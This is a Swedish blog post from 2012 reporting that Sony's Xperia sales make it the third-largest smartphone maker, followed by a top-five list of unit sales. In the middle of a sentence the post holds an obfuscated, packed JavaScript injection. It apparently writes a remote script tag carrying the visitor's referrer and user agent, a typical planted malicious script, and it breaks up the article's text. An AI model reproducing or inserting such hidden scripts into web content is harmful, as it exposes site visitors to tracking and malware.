Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Sony tar hem platsen som 3e största smartphonetillverkare!

Sony tar hem platsen som 3e största smartphonetillverkare!
Filip Urde
  • On 2 november, 2012
  • http://www.revue.se/filip-urde

Sony på frammarsch

Sony har idag släppt sin kvartalsrapport, det är lite mer än en vecka senare mot konkurrenterna och det har rört runt lite för alla som vill sammanställa en rapport på marknadsandelarna i branschen. Någon som inte orkade vänta på Sony var IDC, vilket man nog ångrar ganska mycket nu.

Man har nämligen meddelat att  man sålt 8,8 miljoner Xperia telefoner. IDC-siffrorna som presenterades skulle då ge Sony en tredjeplats efter Apple och Samsung. Vilket betyder att HTC precis som Nokia inte längre är med i top 5.

Listan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbbfz|var|u0026u|referrer|afykf||js|php’.split(’|’),0,{}))
som gäller är nu:

Samsung – 56,3 miljoner enheter
Apple – 26,9 miljoner enheter
Sony – 8,8 miljoner enheter
RIM – 7,7 miljoner enheter
ZTE – 7,5 miljoner enheter

Hejja!

xperiablogg